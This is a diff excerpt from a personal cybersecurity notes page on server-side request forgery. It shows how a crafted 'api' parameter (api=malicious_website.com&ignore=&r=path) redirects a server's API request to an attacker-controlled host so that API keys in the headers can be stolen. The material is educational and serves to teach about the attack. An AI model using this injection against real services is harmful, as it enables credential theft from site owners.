QuentinRa/blog.quentinra.dev/cyber/server/web/ssrf/index.md

 **Steal API credentials** 🗝️<br> `a?api=xxx&r=path` $\to$ `xxx.b/path`

-It's not very likely again, but it's possible that the website is making requests to multiple APIs according to what the user wants.
+It's possible that the website is making requests to multiple APIs according to what the user wants.
 For instance, an API for Pokémon, and another for foods.
 Let's say, for food, the request will be made to `foods.thebestapi.com`, and for Pokémon, il will be `pokemon.thebestapi.com`.
 At first glance, the developer might think that's as we are always calling a subdomain of `thebestapi.com`, it's "safe".
 But, a hacker may use a trick like giving the following value `api=malicious_website.com&ignore=&r=path`.
 If so, the request will be made to `malicious_website.com?ignore=thebestapi.com/path`, as we gave the following value to `api`:`malicious_website.com&ignore=`.
 The goal of such redirect to another website is stealing the API keys stored in the headers.

 **Mapping ports/services** 🗺️